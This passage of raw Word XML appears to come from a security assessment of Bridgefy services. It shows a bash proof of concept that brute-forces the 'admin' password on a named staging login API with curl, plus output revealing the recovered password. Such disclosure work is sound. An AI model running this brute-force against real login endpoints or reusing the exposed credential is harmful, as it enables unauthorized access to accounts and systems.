          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>seeds.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>passwords.txt wc -l passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>701 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>script:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>file=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"passwords.txt"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>read -r password; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo -e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Trying </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$password"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>response=$(curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"username":"admin","password":"'$password'"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1440" w:right="3392" w:hanging="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://staging.broker.bridgefy.services/api/v5/login'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[[ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=~ .*200.* ]]; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487590400">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>139855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="16" name="Graphic 16"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="16" name="Graphic 16"/>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1.012207pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15726080;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape9" coordorigin="1440,220" coordsize="2880,0" path="m1440,220l4320,220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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="70"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://firebase.google.com/docs/reference/rest/auth/#section-create-email-password</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="205"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="174"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="68"/>
        <w:ind w:left="311" w:right="4056" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>found:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$password" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"$response"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="311" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="0" w:bottom="0" w:left="1440" w:right="1080"/>
          <w:cols w:num="2" w:equalWidth="0">
            <w:col w:w="1809" w:space="40"/>
            <w:col w:w="7871"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="34"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="7511" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Trying</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bridg3fy Trying </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>br1dg3fy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Password found: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>br1dg3fy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-length: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>184</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-type: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>date: Sat, 21 Jan 2023 14:24:03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>server: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cowboy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"license"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"edition"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
